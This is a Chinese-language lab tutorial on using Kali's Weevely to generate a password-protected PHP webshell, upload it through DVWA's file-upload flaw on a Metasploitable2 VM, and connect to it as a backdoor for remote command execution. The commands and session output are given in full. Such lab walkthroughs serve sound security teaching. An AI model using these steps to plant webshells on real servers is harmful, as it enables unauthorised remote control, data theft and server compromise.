Kali渗透测试：通过Web应用程序实现远程控制

? 我们所接触的PHP、JSP这样的语言主要是用来开发Web应用程序的，但其实他们的功能十分强大，也可以实现远程控制的功能。我们经常听说的“网页木马”指的就是用PHP、JSP等Web开发语言完成的。这种“网页木马”的特点就是无须考虑被渗透目标的操作系统的类型，只需要考虑Web应用程序的类型，例如攻击目标是一个PHP语言编写的网站，那么就需要使用PHP语言编写的木马。

? 目前有很多工具都提供了自动生成木马的功能，例如国内十分流行的“中国菜刀” “中国蚁剑” “冰蝎” 等。这里我们以Kali自带的内置工具Weevely为例, 它是一个专门用来生成PHP语言木马的工具，同时也提供了丰富的管理功能。

? 这里我们还需要借助metasplotibale2这个靶机中的DVWA，它提供了一个文件上传漏洞，我们将利用这个漏洞将Weevely生成的木马上传并运行，来演示Weevely的功能。上传漏洞广泛存在于各种Web应用程序中，而且后果极为严重。攻击者往往会利用这个漏洞想Web服务器中上传一个携带恶意代码的文件，并设法在Web服务器上运行恶意代码。攻击者可能会将“钓鱼”页面或者挖矿“木马”注入到Web应用程序中，或者直接破坏服务器中的信息，再或者盗取敏感信息。

实验环境

VMware Workstation 16 PRO

操作机：Linux kali 5.10.0 IP (192.168.68.125)

靶机：Metasploitable2-Linux IP (192.168.68.205)

DVWA这个漏洞平台，这里不做赘述，感兴趣的可以自行搜索一下。

操作步骤

1. 登录Metasploitable2-Linux靶机页面

在Kali系统的浏览器地址栏输入http://192.168.68.205,进入靶机的页面，如下图所示：

2. 登录DVWA页面

进入DVWA页面，输入用户名和密码，然后调整安全等级(DVWA Security)为low并提交，然后点击upload，如下图所示：

3. 生成恶意代码

现在需要在操作机（Kali）中生成一段恶意代码，但是这段代码不能是常见的exe或者Linux操作系统下的可执行文件，因为我们无法让它们在服务器中运行起来。但是目标服务器中使用了PHP解析器，所以我们可以使用由PHP语言编写的恶意代码，然后目标服务器会像执行其他文件一样来启动它。利用Weevely生成PHP恶意代码，命令如下：

┌──(kali?kali)-[~]
└─$ weevely generate 123456 /home/kali/Downloads/testweb.php
Generated '/home/kali/Downloads/testweb.php' with password '123456' of 754 byte size.

生成的木马位于/home/kali/Downloads目录下，如下图所示：

4. 在靶机DVWA上传PHP木马

在靶机DVWA的上传漏洞页面，点击Choose File，选择test.php木马文件，然后点击upload上传，提交成功。结果如下图所示：

5. Weevely连接“后门”

使用weevely连接这个“后门”的命令格式如下：

weevely 木马 URL 木马密码

如上图红框中所示，该木马的url应该为http://192.168.68.205/dvwa/hackable/uploads/testweb.php，所以在操作机中应该执行如下命令：

┌──(kali?kali)-[~]
└─$ weevely http://192.168.68.205/dvwa/hackable/uploads/testweb.php 123456

[+] weevely 4.0.1

[+] Target:	192.168.68.205
[+] Session:	/home/kali/.weevely/sessions/192.168.68.205/testweb_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.